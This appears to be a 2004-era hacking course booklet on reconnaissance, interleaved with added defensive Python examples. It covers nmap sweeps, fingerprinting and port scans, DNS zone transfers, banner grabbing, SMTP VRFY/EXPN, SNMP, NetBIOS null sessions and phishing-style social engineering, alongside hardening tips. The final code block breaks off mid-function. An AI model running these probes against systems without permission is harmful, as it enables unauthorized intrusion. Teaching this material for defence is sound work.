IP addresses: An IP address is made up of two fields: the network address and the machine address. The network address is carried by the most significant bits, whereas the machine address is carried by the least significant ones. There are several classes of addresses, namely classes A, B, C, D and E. The difference between them is the number of most significant bits used for the network. An IP address always takes the following form: a.b.c.d. In class A, the b, c and d values can be freely chosen. In theory, one can address a maximum of 16,777,216 (2^(3x8) = 2^24) machines. Class B leaves the values of c and d free, so one will be able to address 65,536 (2^(2x8) = 2^16) machines. Class C leaves only the value of d free, so one will be able to address 256 (2^8) machines. Class D is different, as it is reserved for a particular use: multicasting (broadcasting in real time towards several destinations).
As for the E class, it has not been used up to now except for experimental use. In theory, one has the following address ranges:
Specific addresses:
127.0.0.1 is localhost, or loopback. 62.0.0.0 designates the class A network (all host bits set to 0). 62.255.255.255 designates all machines of that class A network (broadcast; all host bits set to 1).

There are several so-called non-routable addresses. These addresses are reserved for internal use, or for private networks. In theory, these are never routed on the Internet. There are three such ranges of IP addresses:
• Class A: 10.0.0.0
• Class B: 172.16.0.0 to 172.31.0.0
• Class C: 192.168.0.0 to 192.168.255.0
127.0.0.0 is also a particular A class, as it is never dispatched on the network. It is reserved for internal use. It corresponds to the loopback interface. The IP address 127.0.0.1 therefore designates your computer.
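The classful view described above (class letter, default mask, network and broadcast address) and the check against the three non-routable ranges can be worked through in code. The following Python is an added example written for this booklet, not part of the original course material; the three private ranges are expressed as prefixes (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), which is an assumption made here to turn the ranges listed above into testable networks.

```python
import ipaddress

# Classful default prefix lengths described in the text (classes D and E have no host part).
CLASS_PREFIX = {"A": 8, "B": 16, "C": 24}

# The three non-routable ranges listed in the text, written as prefixes (assumption
# made for this example; the text gives them as address ranges).
PRIVATE_RANGES = [
    ipaddress.IPv4Network("10.0.0.0/8"),
    ipaddress.IPv4Network("172.16.0.0/12"),
    ipaddress.IPv4Network("192.168.0.0/16"),
]


def address_class(ip: ipaddress.IPv4Address) -> str:
    """The class is decided by the leading bits of the first octet:
    0xxx = A, 10xx = B, 110x = C, 1110 = D, 1111 = E."""
    first = int(ip) >> 24
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"
    return "E"


def is_private(addr: str) -> bool:
    """True if the address falls in one of the three non-routable ranges."""
    ip = ipaddress.IPv4Address(addr)
    return any(ip in net for net in PRIVATE_RANGES)


def classify(addr: str) -> dict:
    """Return the classful facts about an address: class, default mask, network
    address (host bits cleared), broadcast address (host bits set) and the
    number of addresses the host part can take."""
    ip = ipaddress.IPv4Address(addr)
    cls = address_class(ip)
    info = {
        "address": str(ip),
        "class": cls,
        "loopback": ip.is_loopback,      # 127.0.0.0/8, never sent on the wire
        "multicast": ip.is_multicast,    # class D
        "private": is_private(addr),
    }
    prefix = CLASS_PREFIX.get(cls)
    if prefix is None:
        # Classes D and E have no network/host split.
        info.update(mask=None, network=None, broadcast=None, hosts=0)
    else:
        net = ipaddress.IPv4Network(f"{ip}/{prefix}", strict=False)
        info.update(
            mask=str(net.netmask),
            network=str(net.network_address),
            broadcast=str(net.broadcast_address),
            hosts=net.num_addresses,
        )
    return info


if __name__ == "__main__":
    for sample in ("62.17.4.9", "172.20.5.6", "192.168.1.7", "224.0.0.1", "127.0.0.1"):
        print(classify(sample))
```

Running it on 62.17.4.9 gives class A, network 62.0.0.0 and broadcast 62.255.255.255 with 16,777,216 addresses, matching the figures in the text; 127.0.0.1 comes out as class A but flagged as loopback, and 172.32.0.1 is correctly reported as not private because it lies just past 172.31.255.255.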
CHAPTER I INFORMATION ACQUISITION
1. Public information acquisition

An intrusion attempt always starts by acquiring information on the target system. To do this, a methodology is applied. In the following explanations, we will see what these techniques of gathering information on a system are, how they can be used, and of course how to protect yourself.

A) Whois databases

The information given during the registration of a domain name is saved in public databases called whois databases, and can be consulted freely on the Internet. This data can be found on the domain name providers' websites (gandi, Internic, Arpanet ...) or via websites that directly query the provider databases associated with the domain name (www.allwhois.com). You can find the name and telephone number of the person in charge of the domain, the DNS server addresses and the IP ranges associated with the domain. A request concerning the thehackademy.net domain will for example give the following result:

Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information.

   Domain Name: THEHACKADEMY.NET
   Registrar: GANDI
   Whois Server: whois.gandi.net
   Referral URL: http://www.gandi.net
   Name Server: NS7.GANDI.NET
   Name Server: CUSTOM2.GANDI.NET
   Status: ACTIVE
   Updated Date: 19-apr-2004
   Creation Date: 28-oct-2002
   Expiration Date: 28-oct-2005

>>> Last update of whois database: Tue, 4 May 2004 07:33:44 EDT <<<
DMP DMP DD61-GANDI DMP 7, rue darboy 75011 Paris France 0143554656 0143554646 [email protected] 2003-10-29 13:26:19
B) Internet

A person

You are perhaps a regular on forums or newsgroups, or you have your own web page. A hacker who has targeted you could start by searching for your presence on the web to acquire further information.
• As far as newsgroups are concerned, all the hacker has to do is to use search engines specific to newsgroups, such as http://groups.google.com
• Concerning forums and websites, a simple search with a search engine such as Google (http://www.google.com) will do.
• The main danger of this type of referencing is that you can divulge information that is not destined for the public. Imagine that you describe an installation problem for a specific server on a given operating system: the hacker will have no trouble learning the name and the version of your server and your operating system. So you must at all costs avoid disclosing non-essential information in a place that offers as little security as the web.
• A hacker can also find information through people close to you, by trying to intrude into your private or professional life. Also, you should not forget that it could be someone you know, who may already know private information about you. To avoid any unpleasant surprises, never use passwords related to your birth date, the names of your wife, children or pets, or any information about yourself that could be found out.
• Another method that we have already mentioned is social engineering, which tends to be under-rated. The idea is to use any communication medium (telephone, email, ...), or even to present oneself physically, under a fake identity in order to obtain confidential information. A common technique used against webmail users, for example, is to send an email seeming to come from their administrator, using the excuse of a server breakdown to ask them to register again by giving their login and password; these are then sent to the hacker. So you must bear in mind that in no case will a body or company where you have an account ever ask you for your password; at the most, it will ask for your login.
A company
• For obvious promotional reasons, your company is perhaps present on the web. This can be a further source of information for the attacker if you do not filter the information published on it.
• The status of your company, the names of employees and their email addresses, the name and address of the webmaster in the web pages' source code, non-secured links to elements not destined for the public... These are all pieces of information that your hacker will be more than happy to recover.
• Furthermore, login/password pairs are often related to surname/given name pairs. If this information is present on the site, our hacker could try all the possible combinations by building a list of likely logins/passwords from the names obtained on the site.

After having obtained a certain amount of information on the target system, the hacker will move on to more technical operations, which must be done on the system itself, so as to later elaborate an attack strategy.
C) Technical Information

The very first step for a hacker will always be to obtain your system's IP address, in order to be able to communicate with it. The ping function can be used to check that the system is active on the network. The machine that sends a “ping” to another one expects an echo in reply to ensure that it is indeed available. The PING message must follow the normal IP routing through the gateways and routers... For this, it uses the ICMP protocol encapsulated in the IP packet. The return of a PING (ICMP REPLY) generally gives the time taken by the message to do a round trip (RTT = round trip time) to the destination. There are several versions of PING, and these are more or less complex. The “CODE” field of the ICMP message can give information on the results of the test: network unavailable, machine unavailable, routing failure, etc.

Ping integrates several functions. To visualise all of them, type “ping” in DOS. Among the various functions of ping, these can be highlighted:
1. The “-t” option, which sends ICMP_echo_request packets over and over again, until the user interrupts with a “break” (CTRL+C), e.g. ping -t [IP address]
2. The “-a” option, which resolves an IP address to a host name, e.g. ping -a [IP address]
3. The “-n” option, which is used to send a specific number of ICMP_echo_request packets, e.g. ping -n 8 [IP address]
4. The “-l” option, which can specify the size of the request to send, e.g. ping -l 64 [IP address]
5. The “-i” option, which can impose a time to live (TTL), between 1 and 255, e.g. ping -i 145 [IP address]
6. And in some cases the “-w” option, which can specify the waiting time for echo_reply packets (“timeout”), e.g. ping -w 999 [IP address]
In the answer field you will find:
• the size of the packet you have sent, in bytes;
• the answering delay of the target system, in milliseconds;
• and the remaining TTL when the packet arrived at its destination.
Four ICMP_echo_request requests are sent during a common use of ping, in order to be sure of the results.

The tracert command

Tracing the route taken by a packet to go from a point A to a point B can be useful; for example to determine which geographical zones it crosses, or the last router taken to send data. To do this, you will use the tracert tool on your system. Tracert is the abbreviation of “Trace Route”. The aim of this software is to highlight the path followed by a data packet to reach a precise location on a network. It can be used to check how a network is performing, to check where congestion points are located or to pinpoint infrastructure problems.

The software creates a packet with the source and destination addresses and a TTL (time to live, i.e. the number of gateways that may be crossed) equal to “1”. This packet will stop at the first router it encounters. The latter will send an ICMP error message (time exceeded) with its own address as “source”, addressed to the original sender's “source” address. The “traceroute” software will save this information and create a new packet like the first one, but with a TTL of “2”. Crossing the first router will put the TTL to “1”. The packet will therefore die on the second router. As previously, router number 2 will send an ICMP error message with its address, which will be memorised by “traceroute”... And so on and so forth until the destination.
Use the tracert tool of your system.

Tracert integrates various functions. To visualise them all, type “tracert” in DOS. Three of these functions can be essential:
1. The “-d” option prevents the resolution of the relaying machines' IP addresses into host names, e.g. tracert -d [IP address]
2. The “-h” option can specify the maximum number of hops, i.e. the maximum number of relay points, e.g. tracert -h 45 [IP address]
3. The “-w” option can specify a timeout, i.e. a delay after which the wait for each reply is abandoned, e.g. tracert -w 999 [IP address]

In the results table, you will find a list of the data relay systems. The delays in milliseconds show the amount of time that was needed to contact each relay system, knowing that each trial is done three times. In the last column appear the host names of the relay systems, with their translation into IP addresses. Train yourselves to find the information given in host names and in a traceroute.
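The TTL mechanism explained above (probe with TTL 1, 2, 3, ... and collect the ICMP time-exceeded replies) can be replayed without touching the network. The following Python is an added example, not part of the booklet: it simulates a constructed path of three routers and a destination, with one router that stays silent (which is what produces the “* * *” lines of a real tracert), and honours a maximum hop count like the -h option and three trials per hop like the results table.

```python
from typing import List, Optional, Tuple

# Constructed example path (not from the booklet). Each router is (address,
# answers_expired_probes). The third router silently drops expired packets.
ROUTERS = [("192.168.1.1", True), ("10.0.0.1", True), ("10.0.0.2", False)]
DESTINATION = "203.0.113.9"   # documentation address chosen for the example


def send_probe(routers, destination: str, ttl: int) -> Optional[str]:
    """Forward one probe along the path. Every router decrements the TTL; the
    router at which it reaches 0 discards the packet and, if it is willing,
    answers with ICMP Time Exceeded carrying its own address. A probe that
    survives every router reaches the destination, which answers itself."""
    for address, responds in routers:
        ttl -= 1
        if ttl == 0:
            return address if responds else None   # None = no reply (timeout)
    return destination


def trace(routers, destination: str, max_hops: int = 30, tries: int = 3) -> List[Tuple[int, List[Optional[str]]]]:
    """tracert's loop: TTL 1, 2, 3, ... until the destination replies or
    max_hops (the -h option) is reached. Each TTL is probed `tries` times,
    like the three trials shown per line in the results table."""
    hops = []
    for ttl in range(1, max_hops + 1):
        replies = [send_probe(routers, destination, ttl) for _ in range(tries)]
        hops.append((ttl, replies))
        if destination in replies:
            break
    return hops


def render(hops) -> List[str]:
    """One text line per hop; unanswered probes are printed as '*' like the real tool."""
    return [f"{ttl:>3}  " + "  ".join(r if r else "*" for r in replies) for ttl, replies in hops]


if __name__ == "__main__":
    print("\n".join(render(trace(ROUTERS, DESTINATION))))
```

The run stops at hop 4 because the destination itself answered; with `max_hops=2` the trace ends after two hops without ever reaching it, which is exactly the effect of a too-small -h value. The silent router shows up as a line of asterisks but does not stop the trace, since the next TTL simply passes through it.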
2. Network machines listing

A) Network Mapping

The idea is to list all the machines present on the network, via ICMP requests (ping) on all IPs of a determined range, in order to have a complete picture of which machines are active. This technique can be done manually with a scan tool of the nmap type, which can be used in the shell (with Windows and Linux):
nmap -sP 192.168.124.0/24

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 20:26 CEST
Host 192.168.124.1 appears to be up.
Host 192.168.124.2 appears to be up.
Host 192.168.124.10 appears to be up.
Host 192.168.124.12 appears to be up.
Host 192.168.124.15 appears to be up.
Host Dantes (192.168.124.20) appears to be up.
Nmap run completed -- 256 IP addresses (6 hosts up) scanned in 7.195 seconds
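An administrator running the same ping sweep over their own range wants to turn that output into an inventory and spot machines that should not be there. The following Python is an added example, not part of the booklet: it parses the nmap 3.50 ping-sweep output shown above (reproduced inline), cross-checks the parsed host count against the “6 hosts up” summary line, and compares the result with a constructed asset list in which 192.168.124.15 is deliberately missing.

```python
import re
from typing import Dict, List, Optional, Tuple

# Output reproduced from the booklet's nmap -sP run above.
SAMPLE_OUTPUT = """\
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 20:26 CEST
Host 192.168.124.1 appears to be up.
Host 192.168.124.2 appears to be up.
Host 192.168.124.10 appears to be up.
Host 192.168.124.12 appears to be up.
Host 192.168.124.15 appears to be up.
Host Dantes (192.168.124.20) appears to be up.
Nmap run completed -- 256 IP addresses (6 hosts up) scanned in 7.195 seconds
"""

# Constructed asset inventory for this example; 192.168.124.15 is left out on purpose.
KNOWN_HOSTS: Dict[str, str] = {
    "192.168.124.1": "gateway",
    "192.168.124.2": "fileserver",
    "192.168.124.10": "printer",
    "192.168.124.12": "laptop",
    "192.168.124.20": "Dantes",
}

# Matches both "Host 1.2.3.4 appears to be up." and "Host name (1.2.3.4) appears to be up."
HOST_UP = re.compile(
    r"^Host (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)? appears to be up\.$"
)
SUMMARY = re.compile(r"\((?P<up>\d+) hosts? up\)")


def parse_ping_sweep(text: str) -> List[Tuple[str, Optional[str]]]:
    """Return (ip, hostname-or-None) for every host nmap reported as up."""
    hosts = []
    for line in text.splitlines():
        m = HOST_UP.match(line.strip())
        if m:
            hosts.append((m.group("ip"), m.group("name")))
    return hosts


def reported_up(text: str) -> Optional[int]:
    """Host count nmap itself printed in its closing summary line."""
    m = SUMMARY.search(text)
    return int(m.group("up")) if m else None


def unknown_hosts(hosts, inventory: Dict[str, str]) -> List[str]:
    """Live addresses that are absent from the asset inventory."""
    return sorted(ip for ip, _ in hosts if ip not in inventory)


def audit(text: str, inventory: Dict[str, str]) -> Dict:
    hosts = parse_ping_sweep(text)
    return {
        "hosts": hosts,
        # Guards against a parser that silently drops lines in a new output format.
        "parsed_matches_summary": reported_up(text) == len(hosts),
        "unknown": unknown_hosts(hosts, inventory),
    }


if __name__ == "__main__":
    print(audit(SAMPLE_OUTPUT, KNOWN_HOSTS))
```

The summary cross-check matters in practice: nmap's wording has changed across versions, and a regex that stops matching would otherwise report an empty network rather than an error.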
Graphical utilities such as What's Up Gold can be used to do the same type of operation.
B) Zone Transfer

All domains are associated with a DNS server, hosted either on the network itself, or externally. The role of this service is to send back to a client the IP address associated with a host name. A zone transfer asks the DNS server to list all entries related to a specific domain. This is generally used by secondary name servers to update their entries. If the consultation of these entries is not limited to the secondary server, a hacker can list a domain's entries. The network can then be mapped, without the intruder having to ping each machine individually. The nslookup utility, present on both Linux and Windows, can carry out this operation.
With Linux, the host utility can be used in the shell:

xdream@Laptop:~$ host -l domain server_DNS
Using domain server:
Name: i.fi
Address: 212.16.X.X#53
Aliases:

i.fi SOA ns.i.fi. hostmaster.i.fi. 1084863621 28800 7200 604800 86400
i.fi name server ns.i.fi.
i.fi name server ns1.etworks.net.
i.fi name server ns2.i.fi.
i.fi name server ns2.etworks.net.
i.fi has address 212.16.x.x
....
zuge.i.fi RP zuge.i.fi. .
i.fi SOA ns.i.fi. hostmaster.i.fi. 1084863621 28800 7200 604800 86400
Security

It is however possible to limit this zone transfer, which in Windows is authorised by default towards any server. To do this, launch the MMC utility, go to \Services and Applications\DNS\[server]\Forward Lookup Zone\[Zone Name] | Properties, select the option “Only to the Following Servers”, and give your backup server's IP address. It is also possible to completely deactivate zone transfers if you believe you do not need them, by deselecting the option “Allow Zone Transfer”.
C) Fingerprinting the system

The nmap scanner has an active fingerprinting option:

nmap -O 192.168.124.20

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 22:02 CEST
Interesting ports on Dantes (192.168.124.20):
(The 1648 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
...
Device type: general purpose
Running: Linux 2.4.X|2.5.X
OS details: Linux Kernel 2.4.0 - 2.5.20
Uptime 19.098 days (since Thu Apr 29 19:41:12 2004)
Nmap run completed -- 1 IP address (1 host up) scanned in 5.626 seconds

With Linux, passive fingerprinting is possible with p0f:

Laptop:/home/xdream# p0f
p0f - passive os fingerprinting utility, version 2.0.2
(C) M. Zalewski , W. Stearns
p0f: listening (SYN) on 'wlan0', 193 sigs (9 generic), rule: 'all'.
192.168.124.12:35657 - Linux 2.4/2.6 (up: 85 hrs)
  -> 192.168.124.20:80 (distance 0, link: ethernet/modem)
192.168.124.12:35658 - Linux 2.4/2.6 (up: 85 hrs)
  -> 192.168.124.20:80 (distance 0, link: ethernet/modem)
D) Port scanning
All open ports of the target system are listed to deduce the active services accessible by the attacking machine. Some ports are generally associated with standard services:

Port   Protocol   Associated Service
21     TCP        FTP
22     TCP        SSH
23     TCP        Telnet
25     TCP        SMTP
53     UDP        DNS
80     TCP        HTTP
110    TCP        POP3
111    TCP        Portmapper
139    TCP        Netbios
443    TCP        HTTPS
2049   UDP        NFS
It is however important to note that the fact that a port is open does not always imply that the active service is the one that is normally associated with it: it is entirely possible to run a service other than a web server on port 80, just as it is possible to have a web server running on a port other than 80. A manual analysis, detailed below, will thus be necessary to associate a port with an application.

Several scanning methods can be used. We will use nmap (on Windows and Linux) for this exercise:
• The connect() mode: nmap will deduce that a port is open if the connection is completely established with that port.
• The SYN scan: if a SYN/ACK packet is received after a SYN packet is sent, nmap deduces, as in connect mode, that the port is open. In order to bypass old IDSs, which detected a scan only if communications were entirely established, nmap does not finalise the connection with the sending of an ACK packet. This mode is used by default.

Other options are used, in certain cases, in order to bypass some filtering rules:
• The FIN scan: a FIN packet is sent to each port. If an RST is sent back, this means that the port is closed; if no answer is sent back, nmap deduces that the port is open.
• XMAS: the Xmas scan sends FIN packets with the URG and PSH flags also set.
• The NULL scan: all flags are deactivated.
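Each of the scan modes above leaves a recognisable flag pattern on the wire, which is what an IDS keys on: FIN-only, FIN+PSH+URG and no-flags packets never occur in a legitimate TCP conversation, and a SYN scan shows up as one source opening SYNs against many distinct ports. The following Python is an added example written for this booklet, not part of the original: it classifies constructed packet records by their TCP flags and raises an alert per source, treating any FIN/Xmas/NULL probe as suspicious on its own and SYNs as suspicious only once they fan out over a threshold of ports.

```python
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed packet records (not captured from the booklet's network):
# (source IP, destination IP, destination port, TCP flags as letters
#  S=SYN A=ACK F=FIN P=PSH U=URG R=RST).
PACKETS: List[Tuple[str, str, int, str]] = [
    ("192.168.124.15", "192.168.124.20", 80, "S"),     # ordinary web client: handshake...
    ("192.168.124.20", "192.168.124.15", 49152, "SA"),
    ("192.168.124.15", "192.168.124.20", 80, "A"),
    ("192.168.124.15", "192.168.124.20", 80, "PA"),    # ...and data
    ("192.168.124.12", "192.168.124.20", 21, "S"),     # one source, many ports: SYN scan
    ("192.168.124.12", "192.168.124.20", 22, "S"),
    ("192.168.124.12", "192.168.124.20", 23, "S"),
    ("192.168.124.12", "192.168.124.20", 25, "S"),
    ("192.168.124.12", "192.168.124.20", 110, "S"),
    ("192.168.124.12", "192.168.124.20", 139, "S"),
    ("192.168.124.12", "192.168.124.20", 80, "FPU"),   # Xmas probe
    ("192.168.124.12", "192.168.124.20", 22, ""),      # NULL probe
    ("192.168.124.12", "192.168.124.20", 443, "F"),    # FIN probe
]


def classify_flags(flags: str) -> Optional[str]:
    """Map a flag combination to the scan type it matches; None for ordinary traffic."""
    fs = frozenset(flags)
    if fs == frozenset():
        return "NULL"                 # no flags at all
    if fs == frozenset("F"):
        return "FIN"                  # FIN without ACK never starts or continues a session
    if fs == frozenset("FPU"):
        return "XMAS"                 # FIN + PSH + URG
    if fs == frozenset("S"):
        return "SYN"                  # also a normal connection attempt
    return None


def detect_scans(packets, port_threshold: int = 5) -> Dict[str, Dict]:
    """Aggregate probe-like packets per source. FIN/Xmas/NULL probes are
    reported immediately; SYNs only when they hit at least port_threshold
    distinct destination ports."""
    per_source = defaultdict(lambda: {"ports": set(), "kinds": set()})
    for src, _dst, dport, flags in packets:
        kind = classify_flags(flags)
        if kind is None:
            continue
        per_source[src]["ports"].add(dport)
        per_source[src]["kinds"].add(kind)

    alerts = {}
    for src, info in per_source.items():
        stealth = info["kinds"] - {"SYN"}
        if stealth or len(info["ports"]) >= port_threshold:
            alerts[src] = {"ports": sorted(info["ports"]), "kinds": sorted(info["kinds"])}
    return alerts


if __name__ == "__main__":
    for src, alert in detect_scans(PACKETS).items():
        print(src, alert)
```

The ordinary client at 192.168.124.15 produces a single SYN to one port and is not reported, while the host at 192.168.124.12 triggers an alert for both reasons. A production detector would add a time window to the port count, otherwise a long-lived busy client eventually crosses the threshold.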
Several other nmap options can also be useful:

-F     Only the standard ports specified in the services file are scanned instead of all 65,535.
-P0    Nmap sends an ICMP echo type request before scanning in order to know if the destination machine is up. In some cases, the ICMP protocol is filtered, and the host will not be considered reachable. This option deactivates this preliminary request in order to scan directly (without knowing if the host is reachable).
-sU    Scans UDP ports.
-p     Specifies precise ports (p1, p2, p3...) or ranges of ports (p1-p2) to scan instead of all existing 65,535.
-T     Modifies the time between two sent packets. The possible values are Paranoid | Sneaky | Polite | Normal | Aggressive | Insane
It is also possible to specify several hosts to scan using the following notations in the target:

192.168.0-255.1-254    All machines from 192.168.0.1 to 192.168.255.254
192.168.124.0/24       All machines of the class C network designated by the network address
192.168.124.0          All IPs from 192.168.124.1 to 192.168.124.255
Here are the results of a standard scan:

nmap 192.168.124.20

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-18 23:55 CEST
Interesting ports on Dantes (192.168.124.20):
(The 1648 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
864/tcp  open  unknown
875/tcp  open  unknown
899/tcp  open  unknown
1024/tcp open  kdm
2049/tcp open  nfs
Nmap run completed -- 1 IP address (1 host up) scanned in 1.006 seconds
E) Listing of services
Once the list of open ports is established, the hacker will have to positively identify the services associated with each port, as well as their versions. Several techniques can be used:

Banner Grab

Telnet (Telecommunications Network) enables a client machine to be connected to a shell on a remote server. Telnet clients exist on virtually all platforms (Windows, Unix, MacOS, BeOS…). It allows a TCP connection to any port of a remote machine. To open telnet:
1. Click on “Start”.
2. Then on “Execute”.
3. Type “telnet” and validate.
4. Click on “Connection”, then on “Distant System”.
5. In the window, indicate a host name or an IP address to connect to the remote system. Then, enter a port number.
By connecting to the various server applications a system runs, you can find out plenty of information about the system. The following appendix gives a short description of how you can gather information on these services:
• FTP
• SMTP
• HTTP
• SNMP
• Telnet

Systems or services often present themselves through “banners”. The vast majority of systems do not have a proper configuration. After a quick look at the service's type and version, a hacker will be able to determine what the operating system is and in what way this version is vulnerable. The activity of certain ports can reveal information on the type of remote system, such as ports 135 to 140 (Windows NetBIOS service), 111 (SunRPC on SUN stations)...

FTP : File Transfer Protocol

FTP is a file exchange protocol between two systems. As for all services, a machine A must be equipped with an FTP client, and a machine B with an FTP server. Conventionally, FTP uses the TCP/21 port for commands, and the TCP/20 port for data. The TCP/21 channel is called the Protocol Interpreter or PI, and the TCP/20 channel is called the Data Transfer Process or DTP. Connect to the target FTP service, on port 21. See what information the banner gives you, if there is any.

Note: An “Anonymous” session is one that is set up by the administrator and where anyone can benefit from the server's FTP service (to download files from the server, for example). The logins used in this type of authentication are ftp or anonymous, associated with any email address as a password. The configuration of some FTP services, which leave access open to anonymous sessions, can be so disastrous that some sites allow access to the “passwd” file (“/etc/passwd” on a Linux system; this file contains all active logins on the machine), or to the site's complete tree, or even to directories with write access (where anyone can generally upload files).

With Internet Explorer, browsing the directory listings shows listings typical of UNIX-type systems. It has to be checked that this is really the case. Open an FTP session via telnet and connect as Anonymous. You can connect with telnet to an FTP server if you follow the format of this protocol:
1. USER Anonymous [to enter as Anonymous].
2. PASS [email protected] [You will usually have to give your email address as password]
After this, you will be advancing blindly, especially if you do not know the system. The commands that you can use are generally listed with the command help or ?.
SMTP : Simple Mail Transfer Protocol

The SMTP protocol transfers emails. It is generally implemented on the TCP/25 port. As for all other services, an SMTP service can reveal information through its banner. The most interesting thing, however, is the unnecessary presence of two commands specific to the SMTP service: “vrfy” and “expn”. To check if they are accessible, send the command “help”.
• VRFY : the aim of this command is to check whether an email address exists on the requested server. If you connect to an SMTP service and send the command “VRFY admin”, a positive answer will indicate that there is an “admin” login on the system.
• EXPN : this command checks the existence of aliases within a system for any given account. An alias allows a natural person to have several email addresses and can be a good information source.

In the example below, the hacker has managed to obtain information on someone's identity and on aliases for “root” (most likely addresses related to other administrator systems).
HTTP

The HTTP service is accessible via port 80. Several commands can obtain further information on the system. The procedure is to first send a valid command and then to press ENTER again to validate once more. Example:
1. Connect to www.microsoft.com (telnet www.microsoft.com 80).
2. Enter the command: OPTIONS / HTTP/1.0
3. Validate by pressing ENTER, then validate again.
4. The information contained in P3P (“Platform for Privacy Preferences”) designates the information collected on the users. Please refer to http://www.w3.org/TR/P3P/ to know more about the P3P system.

The information gathered can specify the web server's version, the operating system, the various modules installed on it (php, cgi ...) as well as the various commands that can be sent to the server. Please note that you should normally be disconnected from the system after each command.
SNMP : Simple Network Management Protocol

SNMP is a network equipment management protocol that allows the administrator to ask its equipment to gather information. In our example, we have found four devices on our network which were in the “public” community string, which means that anyone can have access to the information that the devices send back.

On the Internet, you can find tools that can make these requests automatic: http://www.solarwinds.net/

Note: the “public” community string is generally the value given by default to a machine running an SNMP agent. It is up to the administrator to modify its configuration. The opposite of a public string is a “private” string. This one does not authorise the delivery of any information to the general public.

TELNET

This service, which enables remote access to a shell on the system, is generally restricted by a compulsory identification with login and password. The banner on the system can however be useful. Use telnet to connect. By default, you are connected to port 23, so it is not necessary to specify any port.
F) Netbios Listing

On many Windows machines, either for the needs of the user or by default, the file-sharing services using the NetBIOS protocol are very often activated. If the remote machine is badly configured, this protocol can be used to gather information on the system: name of the machine, its domain, its current shares, etc. Several fingerprintings are possible.

NetBIOS Shares

Thanks to the NetShareEnum call, it is possible to list the current shares on a machine. On some systems, entire hard drives are shared without their users realising it.

NULL Session Method

Null sessions are used when a machine wants to have access to the information of another machine without belonging to its domain or its workgroup. In the registry of the target machine, the key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] containing the “restrictanonymous” value determines whether anonymous sessions can be established. To restrict access, all that has to be done is to specify a value of 2: "restrictanonymous"=dword:00000002. Winfingerprint (http://winfingerprint.sourceforge.net) is a Windows machine fingerprinting tool carrying out NetBIOS resolution methods on top of alternative methods.
Here is a scan report obtained with the help of Winfingerprint on a share:

Host Information:
139 tcp Open
Domain: MSHOME NetBIOS ABAMA MAC Address: 0007cb0000ff
Domain: MSHOME NetBIOS ABAMA MAC Address: 0007cb0000ff
Fingerprint:
Role: NT Workstation
Role: LAN Manager Workstation
Role: LAN Manager Server
Role: Server sharing print queue
Role: Potential Browser
Role: Master Browser
Version: 5.1
Comment: room computer
NetBIOS Shares:
(...)
Name: \\82.X.X.X\Printer Remark: Canon Bubble-Jet BJC-3000 Type: Interprocess communication (IPC)
Name: \\82.X.X.X\D Remark: Accessible without password.
Name: \\82.X.X.X\C Remark: Accessible without password.
G) Applicative Fingerprinting

Even if it is possible to de-activate some services' banners, each service implementation has its own characteristics (error codes ...). By comparing the answers received to a database of standard service signatures, it is possible to determine the version. This technique can be used with the -A option of nmap (only on Linux):

Laptop:/home/xdream# nmap -A 192.168.124.20

Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-05-19 00:14 CEST
Interesting ports on Dantes (192.168.124.20):
(The 1648 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsFTPd 1.2.1
22/tcp   open  ssh         OpenSSH 3.4p1 (protocol 2.0)
80/tcp   open  http        Apache httpd 1.3.29 ((Debian GNU/Linux))
111/tcp  open  rpcbind     2 (rpc #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: DgSWORKGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.29 (Ben-SSL/1.53 (Debian GNU/Linux) PHP/4.3.4)
864/tcp  open  ypserv      1-2 (rpc #100004)
875/tcp  open  ypbind      1-2 (rpc #100007)
899/tcp  open  mountd      1-2 (rpc #100005)
1024/tcp open  status      1 (rpc #100024)
2049/tcp open  nfs         2 (rpc #100003)
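From the defender's side, the same -A output is the quickest way to build a version inventory of one's own host and to check it against a policy such as the one in the Security section below (file-sharing and RPC services must not be reachable from the Internet). The following Python is an added example, not part of the booklet: it parses the port table of the nmap 3.50 run above (reproduced inline) into records and flags the open services that belong to a constructed “internal only” list; the list itself is an assumption chosen for this example.

```python
import re
from typing import Dict, List

# Port table reproduced from the booklet's nmap -A run above.
SAMPLE = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsFTPd 1.2.1
22/tcp   open  ssh         OpenSSH 3.4p1 (protocol 2.0)
80/tcp   open  http        Apache httpd 1.3.29 ((Debian GNU/Linux))
111/tcp  open  rpcbind     2 (rpc #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: DgSWORKGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.29 (Ben-SSL/1.53 (Debian GNU/Linux) PHP/4.3.4)
864/tcp  open  ypserv      1-2 (rpc #100004)
875/tcp  open  ypbind      1-2 (rpc #100007)
899/tcp  open  mountd      1-2 (rpc #100005)
1024/tcp open  status      1 (rpc #100024)
2049/tcp open  nfs         2 (rpc #100003)
"""

# Constructed policy for this example: services that must stay on the LAN.
INTERNAL_ONLY = {"rpcbind", "netbios-ssn", "nfs", "mountd", "ypserv", "ypbind", "status"}

# "port/proto  state  service  [version ...]"; the version column is optional
# because -A cannot always identify one.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)


def parse_services(text: str) -> List[Dict]:
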